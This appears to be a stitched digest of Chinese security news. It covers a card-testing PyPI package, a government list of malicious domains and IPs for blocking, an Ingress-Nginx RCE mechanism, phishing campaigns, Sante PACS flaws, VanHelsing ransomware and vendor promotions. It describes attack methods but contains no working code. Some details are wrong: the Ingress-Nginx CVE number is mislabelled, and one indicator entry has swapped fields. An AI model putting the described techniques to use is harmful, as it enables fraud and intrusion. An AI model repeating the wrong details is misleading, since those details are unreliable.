嘶吼

一个新发现的名为“disgrasya”的恶意PyPi包，滥用合法的WooCommerce商店来验证被盗的信用卡，已从开源包平台下载超过34,000次。

该脚本专门针对使用CyberSource支付网关的WooCommerce商店来验证卡，这是梳理参与者的关键步骤，他们需要评估来自暗网转储和泄露数据库的数千张被盗卡，以确定其价值和潜在的利用。

尽管该软件包已从PyPI中删除，但其高下载数量显示了此类恶意操作的绝对滥用量。

Socket研究人员在一份报告中解释说：“与典型的依赖于欺骗或输入的供应链攻击不同，disgrasya并没有试图看起来是合法的。”

这是公开的恶意行为，滥用PyPI作为一个分销渠道，以接触更多的欺诈者。值得一提的是公然滥用PyPi来托管一个包，创建者在描述中明确表示该包用于恶意活动。

Socket指出，软件包上的恶意功能是在版本7.36.9中引入的，可能是为了逃避安全检查的检测，与后续更新相比，初次提交的安全检查可能更严格。

模拟购物者验证信用卡

恶意包包含一个Python脚本，该脚本访问合法的WooCommerce站点，收集产品id，然后通过调用商店的后端将商品添加到购物车中。

接下来，它导航到站点的结结账页面，从中窃取CSRF令牌和捕获上下文，这是CyberSource用户用于安全处理卡数据的代码片段。

Socket表示，这两个通常隐藏在页面上并很快过期，但是脚本在使用虚构的客户信息填充结帐表单时立即捕获它们。

在接下来的步骤中，它不是将被盗的卡直接发送到支付网关，而是将其发送到由攻击者控制的服务器（railgunmisaka.com），该服务器假装是CyberSource并为该卡提供假令牌。

向外部发送卡片数据的POST请求

最后，将带有令牌化卡的订单提交到网店，如果订单通过，则验证该卡是否有效。如果失败，它将记录错误并尝试下一张卡。

打印的交易结果

使用这样的工具，威胁者能够以自动化的方式对大量被盗信用卡执行验证。这些经过验证的信用卡可能会被滥用来进行金融欺诈或在网络犯罪市场上出售。

如何阻止梳理攻击

这种端到端结帐模拟过程对于目标网站上的欺诈检测系统来说尤其难以检测。

“整个工作流程——从收集产品id和结帐令牌，到将被盗的卡数据发送给恶意的第三方，再到模拟完整的结帐流程——都是高度有针对性和有条不紊的，”Socket说。

它被设计成融入正常的交通模式，使得传统的欺诈检测系统难以检测到。

不过，Socket表示，有一些方法可以缓解这个问题，比如阻止价值低于5美元的订单，这通常用于梳理攻击，监控多个失败率异常高的小订单，或者与单个IP地址或地区相关的高结帐量。

Socket还建议在结帐流程中添加CAPTCHA步骤，这可能会中断整理脚本的操作，以及在结帐和支付端点上应用速率限制。

中国国家网络与信息安全信息通报中心通过支撑单位发现一批境外恶意网址和恶意IP，境外黑客组织利用这些网址和IP持续对中国和其他国家发起网络攻击。这些恶意网址和IP都与特定木马程序或木马程序控制端密切关联，网络攻击类型包括建立僵尸网络、挖矿木马、远程控制、后门利用等，对中国国内联网单位和互联网用户构成重大威胁。相关恶意网址和恶意IP归属地主要涉及：美国、荷兰、英国等。主要情况如下：

一、恶意地址信息

（一）恶意地址：ret.6bc.us

关联IP地址：173.109.82.78

归属地：美国/佛罗里达州/迈阿密

威胁类型：僵尸网络

病毒家族：Purple Fox

描述：Purple Fox是一种功能复杂的恶意软件，具备后门、持久化、信息窃取和传播能力，一般通过漏洞利用和钓鱼攻击方式传播，对系统和网络安全构成威胁。防御措施包括及时更新系统、安装安全软件、提高用户意识和加强网络监控。

（二）恶意地址：morphed.ru

关联IP地址：34.219.59.42

归属地：美国/俄勒冈州/波特兰

威胁类型：木马远控

病毒家族：Gamarue

描述：Gamarue是一种木马，某些变种为蠕虫。Gamarue可通过可移动驱动器、垃圾邮件和木马下载器、漏洞利用工具包进行传播。一旦感染设备，病毒会在临时文件夹中生成一个随机文件名的病毒主体，并在注册表创建自启动项；病毒感染可移动存储设备后，会生成文件autorun.inf和一个以U盘卷标+容量命名的快捷方式，并将原U盘所有文件转移到一个隐藏文件夹中。

（三）恶意地址：cinskw.net

关联IP地址：15.197.148.33

归属地：美国

威胁类型：远控木马

病毒家族：silverfox

描述：银狐组织（silverfox），又名“谷堕大盗”，是一个专业从事黑灰产的攻击组织。该攻击组织此前主要针对金融、证券、教育及设计行业，不仅通过使用SEO网站优化使得相关钓鱼网站搜索排名领先，然后诱导用户下载安装木马文件，还通过把木马文件伪装成各种常见的工具、微信聊天记录或者是与金融相关的新闻热点事件和相关教学视频等，诱骗员工点击安装木马文件，从而为后续入侵企业办公网提供入口。该团伙通过控制受害主机权限，在系统内长期驻留、监控用户日常操作、窃取敏感信息，利用受害者的即时通信软件来发送具有针对性的钓鱼、欺诈类信息，实施钓鱼攻击和诈骗等违法行为。

（四）恶意地址：superyou.zapto.org

关联IP地址：44.209.47.121

归属地：美国/弗吉尼亚州/阿什本

威胁类型：远控木马

病毒家族：autoit

描述：AutoIt是一种通过AutoIT脚本语言编写的木马病毒。由于AutoIt解释器本身属于合法程序，黑客可以把恶意代码藏在脚本文件中，从而灵活地创建恶意软件，且在系统中没有独立进程存在，造成其存活周期延长。AutoIt会通过创建注册表创建开机自启动，运行时该病毒会检查自身运行环境，如果检测到虚拟环境则会自行终止。此外，该病毒还可以感染计算机全部磁盘，并驻留内存与服务器通信，实施远程控制。

（五）恶意地址：oeihefoeaboeubfuo.ru

关联IP地址：44.200.87.10

归属地：美国/弗吉尼亚州/阿什本

威胁类型：远控木马

病毒家族：Phorpiex

描述：Phorpiex是一种木马，主要用于构建僵尸网络，感染Windows设备并通过USB驱动器、可移动存储和垃圾邮件传播。它通过弱口令暴力破解用户凭证并传播到网络中的其他PC。感染后，Phorpiex会修改注册表实现自启动，允许后门访问和控制，并尝试连接IRC服务器以执行恶意操作，如下载文件、发动拒绝服务攻击（SYN flood）等。此外，Phorpiex还会下载勒索软件，加密文件并勒索赎金，并新增了感染32位PE文件的功能，会下发Avaddon勒索病毒。

（六）恶意地址：pywolwnvd.biz

关联IP地址：34.219.59.42

归属地：美国/俄勒冈州/波特兰

威胁类型：远控木马

病毒家族：krypt

描述：Krypt（也称为Kryptik）是一种多功能的恶意软件家族，主要针对Windows系统。它通常通过钓鱼邮件、恶意广告或捆绑软件方式传播，具有窃取信息、下载其他恶意软件以及持久化感染的能力。

（七）恶意地址：hacked13.no-ip.info

关联IP地址：104.36.180.25

归属地：远控木马

威胁类型：加拿大/安大略省/多伦多

病毒家族：Poison

描述：Poison是一种后门木马，攻击者会获得未授予的权限进而控制失陷主机。该木马通过注入其他进程来隐藏自身，功能具有下载和上传文件、键盘记录、信息窃取等功能。

（八）恶意地址：donate.v2.xmrig.com

关联IP地址：178.128.242.134

归属地：荷兰/北荷兰省/阿姆斯特丹

威胁类型：挖矿木马

病毒家族：Minepool

描述：Minepool是一种加密货币挖矿池。该矿池可挖掘比特币、科莫多、Litecoinz、Snowgem和Votecoin等多种货币，通过组建一组协作的矿工来运作，利用其他挖矿病毒进行挖矿相关任务。

（九）恶意地址：z.totonm.com

关联IP地址：193.62.37.224

归属地：英国/英格兰/伦敦

威胁类型：挖矿木马

病毒家族：WannaMine

描述：WannaMine是一种挖矿木马，2017年10月发现之初，主要利用“永恒之蓝”(EternalBlue)漏洞进行传播，后来逐步增加通过ssh/telnet暴力破解，利用CVE-2017-0213、CVE-2016-5195等漏洞辅助入侵提升控制权限，主要挖取门罗币。WannaMine最新版本新增了组合与免杀功能，且功能模块独立化，每个模块在攻击流程中都具备明确角色和任务，有效避免单个组织功能模块被关联分析，攻击目标方向由Windows系统扩展至Linux环境，并能够构造僵尸网络，为其他黑客组织提供武器。

（十）恶意地址：anam0rph.su

关联IP地址：18.141.10.107 

归属地：新加坡

威胁类型：后门木马

病毒家族：andromeda

描述：Andromeda是一种模块化的后门木马。最原始的病毒仅包含一个加载器，在其运行期间会从C&C服务器上下载相关模块和更新，它同时也拥有反虚拟机和反调试的功能。病毒可以通过使用Rootkit隐藏与自身相关的进程、文件和注册表项。此外，病毒还会控制感染主机构建僵尸网络，用于分发其它病毒，也可能会下载其它病毒进入系统，还可能会进行其他如DoS/DDoS拒绝服务攻击等恶意活动。

二、排查方法

（一）详细查看分析浏览器记录以及网络设备中近期流量和DNS请求记录，查看是否有以上恶意地址连接记录，如有条件可提取源IP、设备信息、连接时间等信息进行深入分析。

（二）在本单位应用系统中部署网络流量检测设备进行流量数据分析，追踪与上述网络和IP发起通信的设备网上活动痕迹。

（三）如果能够成功定位到遭受攻击的联网设备，可主动对这些设备进行勘验取证，进而组织技术分析。

三、处置建议

（一）对所有通过社交平台或电子邮件渠道接收的文件和链接保持高度警惕，重点关注其中来源未知或不可信的情况，不要轻易信任或打开相关文件。

（二）及时在威胁情报产品或网络出口防护设备中更新规则，坚决拦截以上恶意网址和恶意IP的访问。

（三）向公安机关及时报告，配合开展现场调查和技术溯源。

文章来源自：国家网络安全通报中心

漏洞概述

近日，Ingress-Nginx 项目的维护者们发布了一批关键漏洞的修复补丁，其中包含了高风险漏洞（CVE-2025-29927），攻击者可以利用该漏洞轻易接管你的 Kubernetes 集群。目前有 40% 以上的 Kubernetes 管理员正在使用 ingress-nginx，建议您及时开展安全风险自查。

Ingress-Nginx 是 Kubernetes 生态中基于 Nginx 实现的 ‌Ingress 控制器‌‌，用于管理集群外部的 HTTP(S) 和 WebSocket 流量路由‌。其核心作用是通过定义路由规则，将外部请求按域名、路径等策略转发至集群内部服务，并提供负载均衡、SSL 终止、限流等高级功能‌。

据描述，Ingress-Nginx 在 v1.11.5、v1.12.1 之前的版本中存在一个安全漏洞。攻击者向同一 Pod 内的 NGINX 服务器发送一个长缓冲请求。NGINX 会将该请求缓存为一个临时文件，然后攻击者发送第二个请求至准入验证 Webhook 服务器（Admission Validating Webhook Server）。该 Webhook 会触发 NGINX 生成一个包含恶意配置指令 ssl_engine badso_location;准入 Webhook 会执行 nginx -t 命令来验证配置文件的合法性。由于 NGINX 在加载配置时会直接解析并执行特定指令，攻击者可通过恶意指令在 NGINX 服务器的上下文中触发远程代码执行（RCE），从而完全控制服务器。

漏洞影响的产品和版本：

< v1.11.0  

v1.11.0 - 1.11.4  

v1.12.0

漏洞复现

资产测绘

据daydaymap数据显示互联网存在15102个资产，国内风险资产分布情况如下：

解决方案

临时缓解方案：

启用mTLS认证准入控制器；

定期审计Ingress注解使用情况；

实施Pod安全策略限制挂载敏感目录。

升级修复：

目前官方已发布修复安全补丁

参考链接

原文链接

2025年政府工作报告中指出，培育壮大新兴产业、未来产业。深入推进战略性新兴产业融合集群发展，开展新技术新产品新场景大规模应用示范行动，推动商业航天、低空经济等新兴产业安全健康发展。作为重塑区域经济版图、重构产业竞争格局的战略性新兴产业，低空经济热度持续攀升。近日，2025年低空经济产业发展大会在北京隆重召开，众多行业领军者、权威专家齐聚京城，共探低空经济的未来发展方向。

在此盛会中，盛邦安全载誉而归，凭借深厚的技术积累与不懈的创新实践，率先布局低空网络安全领域，成功打造了极具影响力的行业标杆。盛邦安全与星展测控携手，针对低空场景应急难题，精心打造 “低空网络安全技术在无人机多场景中的应用研究” 解决方案，在抢险救灾、应急通信等低空应急场景下，保障无人机网络安全，让信息稳定传输。从海量申报案例中脱颖而出，不仅获得行业高度认可，还经专家评审团一致通过，成功入选 2025 年度低空经济典型案例，成为行业瞩目的焦点。同时，董事长权小文被任命为 “低空经济五十人论坛” 理事，这不仅是对盛邦安全深耕低空网络安全领域的高度肯定，更将激励公司在未来持续开拓创新，引领行业迈向新高度 。

✦ 低空无人飞行安全防护解决方案

面对当前低空无人飞行所面临的安全挑战，盛邦安全推出针对性解决方案——低空无人飞行安全防护解决方案，为低空经济发展装上 “安全锁”。该方案包括了无人机终端安全、飞行控制中心系统安全、机库系统安全、无人机与飞行控制中心之前的空口通信信道安全、飞行控制中心与机库之间的地面通信信道安全等方面。具有三大显著优势：

1、全方位安全防护：从无人机设备到飞行网络，构建起一套完整的安全防护体系，杜绝任何安全隐患。

2、跨网络组网能力：通过软件定义的技术实现任意网络组网，为跨地域的无人机库或飞控中心节点构建专网提供优化方案，能够支持多种NAT穿越模式，实现任意网络的互连。

3、无损通信安全防护：在保障通信安全的同时，不会对无人机通信效率产生任何负面影响，让无人机飞行既安全又高效。

未来，随着低空经济进入高速发展的黄金时期，盛邦安全将依托自身深厚的技术底蕴，不断拓展低空经济的应用版图。与更多的低空经济无人装备优质厂商，搭建开放多元的合作平台，通过资源共享、优势互补，凝聚协同创新的强大合力；继续聚焦低空旅游、智慧城市、应急救援等新兴场景，开展深度调研，精准把握市场需求，量身定制一系列贴合实际的低空经济安全解决方案。用创新科技为低空经济的安全、有序发展筑牢坚实防线，全力书写低空经济安全领域的全新篇章 。

原文链接

重庆信通设计院简介：

拥有等级保护测评、商用密码应用安全性评估、数据安全评估等服务资质，并具有中国网络安全审查技术与认证中心、中国信息安全测评中心颁发的网络安全服务资质；依托专业的精英团队，能够为客户提供专业的等级保护、商用密码、数据安全测评及咨询服务，并致力于成为集咨询、规划设计、测评、运维、攻防对抗、培训等能力于一体的综合型网络与信息安全专家。

荣誉与资质：

担任多个理事和支撑单位，如：重庆市互联网界联合会监事长单位、重庆市信息安全协会副理事长单位、重庆市互联网协会理事会成员、重庆市云计算产业协会理事单位、重庆市信息技术应用标准化技术委员会秘书单位、重庆市网络与信息安全信息通报机制-技术支持单位、市委网信办、市公安局、市通管局等的长期技术支撑单位；拥有等保测评、密评、数安评估、培训等较为丰富的网络与信息安全相关服务资质。

来源：重庆信通设计院天空实验室

近期，冒充 E-ZPass 及其他收费机构的网络钓鱼活动愈演愈烈，收件人会收到多条 iMessage 和短信，企图窃取个人及信用卡信息。

这些信息中嵌入了链接，一旦点击，就会将受害者带到冒充 E-ZPass、The Toll Roads、FasTrak 或其他收费机构的钓鱼网站，试图窃取他们的个人信息，包括姓名、电子邮件地址、实际地址和信用卡信息。

这种诈骗手段并非新出现的，联邦调查局早在 2024 年 4 月就已发出过相关警告。这些短信绕过了反垃圾邮件措施，且来自看似随机的电子邮件地址，再加上攻击的规模，表明这仍是一次自动化攻击。

此次发现的诈骗短信冒充 E-ZPass 或机动车管理局直接发送。这些短信使用的语言带有紧迫感，比如称通行费需在一天或两天内支付，否则将产生额外费用，或者驾照将被吊销。

该活动中的网络钓鱼短信样本

苹果 iMessage 自动关闭来自未知发件人的信息链接，以保护用户免受短信钓鱼诈骗。为了绕过这一点，骗子会让用户回复文本，这样链接就可以点击了。

点击提供的链接将受害者带到一个E-ZPass网络钓鱼网站，除了URL，它看起来像一个合法的网站。安全研究人员测试表明，该钓鱼网站仅在手机上加载，因此桌面用户不会看到它。

受害者登录的钓鱼页面

在这种骗局中发送的短信数量如此之大，以至于用户对特定骗局发生频率表示沮丧，据统计，这种信息有时一天多达7条短信。

虽然这些信息的来源尚未确定，但最近发现了一个名为Lucid的新兴网络钓鱼即服务平台，该平台与这些类型的骗局有关。

Lucid和Darcula等平台使用加密的iMessage和RCS消息绕过传统的反垃圾邮件过滤器，发送大量文本，而不会产生与标准短信发送相关的成本。

如果用户收到其中一条消息，应该阻止并报告该号码，以便将电子邮件地址或电话号码报告给Apple。然而，作为一般规则，用户应尽量避免回应这些骗局。

对于那些担心他们有合法的未付款项的人，应该直接登录收费当局的网站来检查任何余额。邦调查局此前曾建议收件人在IC3门户网站上提出投诉。

在近期的网络安全威胁事件中，黑客利用虚假的 Semrush 广告，试图窃取 Google 账户凭证。

Semrush 是一款颇受众多企业欢迎的 SEO 和广告平台，40% 的财富 500 强公司都在使用。攻击者正是看中了 Semrush 在业界积累的信任度，精心策划了这场恶意攻击，目标直指极具价值的 Google 账户信息。

网络钓鱼流程

此次网络钓鱼活动从投放 “Google Ads” 广告拉开序幕，这些广告会将用户导向一个伪造的 Semrush 登录页面。

虚假的 Semrush 和 Google 帐户登录页面

起初，广告打着 “Google Ads” 的旗号，没过多久，便完全伪装成 Semrush 的样子。

攻击者注册了与 Semrush 极为相似的域名，借助这些域名，将用户诱骗至虚假登录页面。值得注意的是，这些页面只允许用户使用 Google 账户凭证登录，显然，他们的主要目标就是获取 Google 账户信息。一旦受害者输入账户凭证，信息便会被立即传送给攻击者，如此一来，Google Analytics（谷歌分析）和 Google Search Console（谷歌搜索控制台）中的敏感数据极有可能被泄露。

影响与风险

据相关报告指出，黑客入侵 Google 账户后，能够获取关键的业务数据，比如网站性能指标、用户行为模式，以及 Google Analytics 中的财务洞察信息。这些信息一旦落入不法分子手中，他们便能借此在竞争中抢占先机，甚至实施金融欺诈。

再者，Google Analytics 和 Search Console 的数据与 Semrush 这类工具存在集成关系，这意味着攻击者即便不直接登录 Google 账户，也能获取大量机密商业信息。这种数据的互联互通，还可能让攻击者冒充企业，哄骗供应商或合作伙伴向欺诈账户转账，进而造成更严重的财务损失。

应对措施与建议

为应对这一威胁，网络安全专家已将这些恶意广告报告给 Google，Malwarebytes 等公司也已着手部署针对此类网络钓鱼活动的防护措施。

钓鱼页面 

专家建议，用户在点击广告时务必谨慎，尤其是那些会跳转到陌生登录页面的广告。同时，采取诸如开启双因素身份验证、定期监控账户活动等强化安全措施，有助于防范此类攻击。鉴于品牌冒充仍是常见的攻击手段，个人和企业都应时刻保持警惕，积极主动地保护自身的数字身份安全。

近日，Black Hat Asia 2025（亚洲黑帽大会）在新加坡举办。作为网络安全行业久负盛名的系列活动，Black hat聚焦先进安全研究、发展和趋势，以其强技术性、权威性和客观性引领未来安全思想和技术走向。360数字安全集团专家受邀以《大语言模型在提取可操作的TTP攻击链中发挥的关键作用》为题发表演讲，深入分享了360基于大模型在TTP攻击链的提炼、检测和评估方面取得的突破性进展。

当前，大模型技术加速渗透至各行各业。在安全领域，大模型以其强大的分析和理解能力极大提高了安全运营的处理效率和精度。随着安全防御体系向主动和动态演进，如何及时捕获可模拟和执行TTP（Tactics, Techniques, and Procedures，即技术、战术和过程）知识变得至关重要。这一过程极其耗时费力，大模型具有一定优势，但还不能准确提取TTP攻击链，需进一步改进。

360安全专家提出了一种高效实用的方法，通过将大模型与其他技术进行创新组合，利用多种途径为大模型提供上下文支持，克服了提取TTP攻击链的幻觉问题的同时，将其转化为可执行格式，以实现对TTP攻击链知识的快速捕获和转换利用。

360安全专家在演讲中阐述到，360将小模型预测的TTP结果与现有知识图谱中相似的TTP数据作为安全大模型的上下文输入，让安全大模型进行验证和思考，并基于知识图谱的推理能力进行补充，最终将TTP攻击链转化成可执行的结果，以实现对TTP攻击链知识的高效、精准、自动转化。目前，在这套方法的加持下，360安全大模型在威胁检测和评估的能力提升30%，进一步优化了安全策略效果，并在安全运营、效能评估等场景落地应用。

· 在安全运营领域，360通过安全大模型与本地安全大脑相结合，将优质平台与顶尖大模型深度融合，整合独家安全工具、高价值安全知识，融入智能体框架，重塑告警研判、攻击溯源、响应处置等流程，体系化提升客户的全局态势感知和主动防御能力，驱动广大政企单位智能化升级。

· 在效能评估领域，360将安全大模型赋能BAS产品，以实战化、自动化、常态化的自评估机制，构建高质量、高还原度的攻击场景和攻击模拟“真题”，为企业机构提供持续性的防御态势评估，度量整体防御效能和差距，同时提供针对性的改进建议，帮助客户实现安全防御能力的持续提升与闭环。

本次亮相Black Hat Asia，是行业对360安全大模型创新能力和技术实力的认可。目前，360安全大模型已经加持360全线安全产品，并在政府、金融、央企、运营商、教育、医疗等关键基础设施行业落地使用。未来，360将持续开展安全大模型的赋能升级工作，持续打造安全新质生产力。

当下，以DeepSeek为代表的大模型应用正成为各个领域创新的”加速器“，但同时也给邮件安全领域埋下了新的隐患。恶意攻击者利用AI技术批量生成高度仿真的钓鱼邮件和变体病毒，使传统基于规则库的邮件防御体系面临失效风险，企业信息安全正遭遇智能化攻击的威胁。

据《2024中国企业邮箱安全性报告》显示，2024年，全国企业邮箱用户共收到各类钓鱼邮件约755.0亿封，相比2023年增加了30.8%。生成式AI已成为各类恶意邮件的重要生产者之一。

AI技术重构邮件攻防格局

如今，每分钟都有数万封 AI 生成的恶意邮件涌入网络，邮件安全攻防博持续升级，主要体现在以下几个方面：

攻击者手段的三重升级

1. 自动化升级：攻击者利用AI大模型能够定制自动化攻击脚本，实现从目标分析到钓鱼内容生成的闭环作业，精准模仿企业邮件特征

2. 伪装升级：自然语言生成(NLG)技术伪造合规邮件语义，结合多态混淆技术绕过传统检测。

3. 策略升级：AI批量生成高度仿真的钓鱼内容（文本/图片/附件），动态“升级”

动态威胁&防守者的两重困境：

1. 传统规则的滞后性：AI加持下，攻击者更加轻易绕开规则和特征的拦截

2. 小模型拦截需要时间以及样本训练：反垃圾小模型拦截需要时间和样本学习

四大AI底层能力，以AI之盾应对AI之矛

2025 年，面对AI 邮件攻击来势汹汹，CACTER 依托大模型 AI 能力，融合成熟的邮件安全防护体系，正式推出了新一代 CACTER 大模型邮件安全网关：

1. 语言义深度理解能力：基于Transformer架构的上下文建模

2. 多模态联合分析能力：跨文本/图像/附件的统一表征学习

3. 零样本威胁检测能力：大模型的泛化推理能力

4. 攻击者画像构建能力：社交网络辅助的关联分析

三大关键功能模块，护航企业邮件安全

CACTER大模型邮件安全网关依托AI深度防御体系，精准拦截新型高级恶意威胁邮件，首创高管专属防护方案，通过多重检测机制，保护企业邮件安全：

·高管保护

企业核心人员作为关键决策者，掌握着大量重要信息，是AI “定制化” 定向攻击的目标。

CACTER大模型邮件安全网关凭借强大的检测能力，能及时拦截针对高管的钓鱼邮件、恶意软件传播邮件以及商业机密窃取邮件：

1. 混淆文本类恶意邮件检测；

2. 罕见恶意后缀附件检测；

3. 基于语义意图理解能力：

4. 从垃圾邮件中二次识别新型高级恶意威胁；

5. 提升外语（小语种）恶意邮件检出率。

·大模型 URL 沙箱

AI 赋能的动态防御体系，可通过意图级行为追踪和多模态分析验证，有效识破钓鱼链接的伪装，大幅提升新型恶意 URL 的检出率，让钓鱼链接无处藏身：

1. 意图级解析；

2. 行为链追踪；

3. 多模态分析验证；

4. 提升对新型恶意URL检出率。

·AI 智能报告

支持AI数据分析，“自定义制作统计报告”和“定时推送统计报告”场景，深度解析邮件恶意数据，提出邮件防控策略：

1、邮件过滤数据深度挖掘和可视化解读；

2、智能生成邮件安全防护策略。

AI 恶意攻击与安全防御激烈博弈，形势瞬息万变，邮件安全作为企业信息防护的重要一环，其面临的风险不容轻视。

CACTER始终坚信邮件安全是企业安全的基石，未来，将致力于深耕AI安全技术，以创新驱动防御进化，助力企业应对未来更复杂的网络安全挑战。

北京可信华泰信息技术有限公司（以下简称“可信华泰”）近日宣布启动战略升级，将于近期推出基于AI大模型的全新产品与解决方案。此次转型标志着这家深耕网络安全领域十余年的技术企业正式进军可信AI赛道。

作为中国电子信息产业集团（CEC）的战略参股企业，可信华泰自2012年成立以来，始终专注于可信计算3.0技术体系的研发与应用。其自主研发的“白细胞”计算机免疫平台等核心产品，成功破解了关键信息基础设施的高等级安全防护难题，目前已在党政军机关及重点行业的信息系统中实现规模化部署，成为国家网络安全等级保护2.0标准的重要技术支撑单位。

在国产化信息系统加速落地的产业背景下，可信华泰近年来保持高速发展态势：军工领域完成5个型号产品研发，累计部署量达几十万套；联合国内头部IT企业构建运维生态体系，其配置管理软件已覆盖大范围国产化市场。特别在移动端安全领域，该公司已形成独特的技术优势。

面对AI大模型引发的网络安全产业变革，这家长期深耕可信计算领域的技术企业正开启双重战略布局。据公司负责人介绍，一方面将深化可信计算3.0技术在垂直行业的应用拓展，另一方面将融合AI技术创新安全解决方案。“我们既要做强传统优势业务，更要把握AI浪潮下的新增量市场。“

公司分析指出，DeepSeek等开源模型有效降低了私有化部署门槛，推动智能化进程加速。随着各行业AI应用场景的爆发式增长，新型安全需求持续涌现。对此，可信华泰确立两大突破方向：一是基于行业知识库开发专用AI模型，二是创新研发“AI安全可信套装”，将可信计算技术与AI系统深度融合。

据悉，该公司已组建专项团队推进数据治理、知识库构建、智能体开发等工作。首款面向国产化信息系统的运维专家大模型已完成研发，同时“DeepSeek安全可信一体机”业已面世。该方案依托可信计算3.0技术架构，通过TPCM（可信平台控制模块）实现硬件级安全防护，可提供超越系统权限的安全度量与监控能力。

值得关注的是，该解决方案支持用户采用自主密钥管理体系，支持核心密钥的全流程替换，确保用户对数据和系统的完全掌控。据可靠消息，相关产品将于4月中旬正式商用发布，届时将详细披露“国产化信息系统运维专家大模型”与“DeepSeek安全可信一体机”的技术参数及商业应用场景。

最近，在 Sante PACS Server 4.1.0 版本中发现了几个严重漏洞，这使得该版本极易遭受严重的安全威胁。

这些漏洞（CVE - 2025 - 2263、CVE - 2025 - 2264、CVE - 2025 - 2265 和 CVE - 2025 - 2284）会让服务器面临潜在攻击风险，可能引发未经授权的访问、数据泄露以及拒绝服务（DoS）等情况。

在本文中，我们将深入剖析每个漏洞，给出受影响代码的示例及漏洞摘要。

漏洞概述

CVE - 2025 - 2263：EVP_DecryptUpdate 基于堆栈的缓冲区溢出

该漏洞源于 Sante PACS 服务器在使用 OpenSSL 的 EVP_DecryptUpdate 时，出现基于堆栈的缓冲区溢出问题。在用户登录服务器的过程中，服务器使用固定大小为 0x80 字节的堆栈缓冲区来解密用户名和密码。攻击者可以通过发送超长的加密用户名或密码来利用此漏洞，进而引发缓冲区溢出，甚至可能实现代码执行。

有漏洞的代码：

CVE - 2025 - 2264：路径遍历信息泄露

此漏洞使得未经身份验证的远程攻击者能够下载服务器磁盘上的任意文件。嵌入式 Web 服务器负责提供特定目录中的文件，但它未能对请求路径进行正确验证，从而引发路径遍历攻击。攻击者可以构造一个超出预期目录结构的 URL 来利用该漏洞。

利用示例：

CVE - 2025 - 2265：HTTP.db SHA1 哈希截断

在此漏洞中，如果存储在服务器的 SQLite 数据库中的密码哈希值包含零字节，那么该哈希值将会被截断，这就使得它容易遭受碰撞攻击。攻击者可以利用路径遍历漏洞先下载数据库，然后找到与截断哈希值等效的密码。

易受攻击的哈希处理代码：

CVE - 2025 - 2284：访问未初始化指针 DoS

当服务器尝试从格式错误的请求中提取登录凭据时，就会出现这个拒绝服务漏洞。如果 “usrname” 字段后面没有足够的行，服务器可能会访问未初始化的指针，进而导致崩溃。

格式错误的请求 PoC：

漏洞摘要

为了防范这些漏洞，建议用户将 Sante PACS 服务器升级到 4.2.0 或更高版本。根据 Tenable 的报告，此次更新将修复这些安全问题，增强系统的整体安全态势。用户还应考虑采取额外的安全措施，如网络分段和定期监控，以便检测潜在的攻击尝试。

与任何软件漏洞情况一样，及时采取行动对于确保敏感数据的完整性和系统可用性至关重要。定期更新和安全审计是维护强大网络安全防御体系的基本操作。

近日，全球领先的IT市场研究和咨询公司IDC发布《IDC Market Glance: 中国AI Agent应用市场概览，1Q25》 （Doc#CHC53057625，2025年3月，简称“报告”），报告提供了中国AI Agent应用市场的细分市场分类以及代表厂商，旨在全面展示中国AI Agent应用的市场格局。凭借领先的大模型技术与应用实力，360入选智能助理、内容创作、办公协同、生产力工具、安全等五大领域代表厂商，数量位居安全行业首位，成为引领中国大模型及Agent应用市场发展的关键力量。

IDC指出，当前，国内AI Agent市场对定义缺乏一致性，真正符合自主性、主动性、适应性特质的AI Agent产品较少，这直接导致市场产品质量良莠不齐，终端用户甄别难度增大。为此，IDC对市面上的AI Agent应用进行了梳理，从消费者端和企业端两大维度的多个方面展示了智能体的多元化应用。

360在消费者端拥有近20年的国民级互联网服务经验，并在实践中沉淀了成熟的企业级大模型和智能体解决方案。在本次报告中，360凭借360安全大模型、360纳米AI、360织语等产品在消费者端的智能助理、内容创作领域和企业端的办公协同、生产力工具、安全领域表现突出，成为安全行业入选最多领域的厂商。具体来说：

· 360安全大模型：360提出用AI重塑安全并推出首个AI实战应用的安全行业大模型：360安全大模型，在安全智能体方面，聚焦自动化威胁狩猎、深度分析研判、威胁攻击溯源、钓鱼邮件检测等领域进行专项训练，推出100+安全数字专家，帮助企业进行针对性安全防护能力提升，低成本、高效率地实现24小时不间断安全守护。

· 360纳米AI：拥有全网最大的大模型超市，集成包括DeepSeek、豆包、Kimi等国内16家大模型厂商的50多款模型；上线全网首个大模型驱动的多模态知识库，成为用户的第二大脑，永久记忆；纳米AI还是视频高手，文生图、图生视频、视频生视频，各类视频大模型随心调用，为个人用户带来全新的大模型使用体验。

· 360织语：立足政企智能化协作深度需求，通过得天独厚的超级入口和底座能力，以Agent开发平台为核心引擎，与业务集成、应用生成、事项协作等能力紧密结合，深度打通业务流、消息流与知识流，实现跨系统、跨部门的一体化业务协同，用AI重塑政企协作流程，让复杂工作更简单更高效。

IDC强调，Al Agent将迎来规模化落地浪潮。未来，360将持续深耕大模型在各领域的落地应用，加速产业数智化升级，推动人工智能迈向新高度！

一种名为 VanHelsing 的新型多平台勒索软件即服务（RaaS）操作已经出现，其攻击目标涵盖 Windows、Linux、BSD、ARM 和 ESXi 系统。

3 月 7 日，VanHelsing首次在地下网络犯罪平台上进行推广，可使经验较多的会员免费加入，但要求经验较少的威胁者缴纳 5000 美元的押金。

CYFIRMA 在上周晚些时候首次记录了这一新的勒索软件操作，Check Point Research 则进行了更深入的分析，并于昨日发表相关报告。

VanHelsing内部运作

Check Point 的分析师报告称，VanHelsing 是一个俄罗斯的网络犯罪项目，该项目禁止针对独联体（CIS）国家的系统进行攻击。

联盟会员能够保留 80% 的赎金，而运营商收取 20% 的佣金。付款通过自动托管系统处理，该系统采用两个区块链确认来保障安全。

VanHelsing 广告邀请会员加入

被接受的附属机构可以访问具有完整操作自动化的面板，同时还能获得开发团队的直接支持。

从受害者网络窃取的文件直接存储在 VanHelsing 行动的服务器上。核心团队声称，他们会定期进行渗透测试，以确保系统具备一流的安全性和可靠性。

目前，暗网上的 VanHelsing 勒索门户列出了三名受害者，其中两名在美国，一名在法国。其中一个受害者是德克萨斯州的一个城市，另外两名受害者是科技公司。

VanHelsing 勒索页面

勒索软件运营商威胁称，如果他们的财务要求得不到满足，将在未来几天泄露被盗文件。根据 Check Point 的调查，赎金金额为 50 万美元。

VanHelsing 的勒索信

隐身模式

VanHelsing 勒索软件由 C++ 编写，有证据显示它于 3 月 16 日首次在实际环境中部署。

